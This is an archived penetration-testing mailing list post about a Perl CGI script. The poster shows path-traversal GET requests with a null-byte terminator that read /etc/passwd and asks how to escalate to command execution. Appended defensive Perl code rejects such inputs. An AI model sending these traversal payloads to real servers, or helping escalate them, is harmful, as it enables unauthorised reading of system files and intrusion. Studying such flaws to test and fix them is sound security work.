Penetration Testing mailing list archives
vulnerable perl script?
From: otaner () gmx ch
Date: Thu, 18 Oct 2001 19:07:27 +0200 (MEST)
Hi,

I'm doing a pen test and I found a perl script, which seems to be vulnerable. If I do a get, for example:

GET /cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../etc/passwd%00

I can see the content of the passwd file. But when I try to execute a command, for example:

GET /cgi-bin/whatever.pl?variable1=test%00&variable2=../../../../../../bin/id%00

I get this garbage and some interesting stuff:

I'm not sure but I think, the %00 is the problem and without %00, I get no results. Does anybody know how I can execute my commands? I tried ; and ¦, but nothing happened. I'm not able to see the source of the perl file.

Any help would be appreciated.

otaner
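The requests in the post pass a file name in variable2 with `../` sequences and a trailing `%00`. As an added example (not part of the original post, and not the source of the tested script, which the poster could not see), this Perl sketch shows a server-side check that rejects such values before they reach open(). The suffix, the directory layout and the function name `safe_path` are assumptions made for illustration.

```perl
# Added example (not the tested script): validate a file-name parameter
# before it reaches open(). Directory layout and suffix are assumptions.
use strict;
use warnings;
use Cwd qw(abs_path);
use File::Spec;
use File::Temp qw(tempdir);

my $SUFFIX = '.txt';    # hypothetical suffix the script appends

# Returns the resolved path inside $base, or nothing if the value is rejected.
sub safe_path {
    my ($name, $base) = @_;
    return unless defined $name;
    # Allow-list on the decoded value: no NUL, no '/', no '.', bounded length.
    return unless $name =~ /\A[A-Za-z0-9_-]{1,64}\z/;
    my $real_base = abs_path($base);
    return unless defined $real_base;
    # Resolve symlinks, then confirm the result is still under the base.
    my $real = abs_path(File::Spec->catfile($real_base, $name . $SUFFIX));
    return unless defined $real && -f $real;
    return unless index($real, "$real_base/") == 0;
    return $real;
}

# Constructed demo data: a temporary directory holding one servable file.
my $base = tempdir(CLEANUP => 1);
open(my $out, '>', File::Spec->catfile($base, "report$SUFFIX")) or die "setup: $!";
print {$out} "quarterly report\n";
close($out);

# Values as the script sees them after URL decoding (%00 becomes "\0").
my @inputs = ("report", "test\0", "../../../../../../etc/passwd\0", "../../../../../../bin/id\0");

for my $value (@inputs) {
    (my $shown = $value) =~ s/\0/\\0/g;    # make NUL visible in the output
    my $path = safe_path($value, $base);
    if (defined $path) {
        # Explicit read mode: the value is only ever used as a file name.
        open(my $fh, '<', $path) or die "open: $!";
        my $first = <$fh>;
        close($fh);
        print "ACCEPT $shown -> $first";
    } else {
        print "REJECT $shown\n";
    }
}
```

The allow-list is applied to the decoded value, so the NUL byte and the traversal sequences are refused before any path is built; the prefix check after `abs_path` additionally catches symlinks that point outside the base directory.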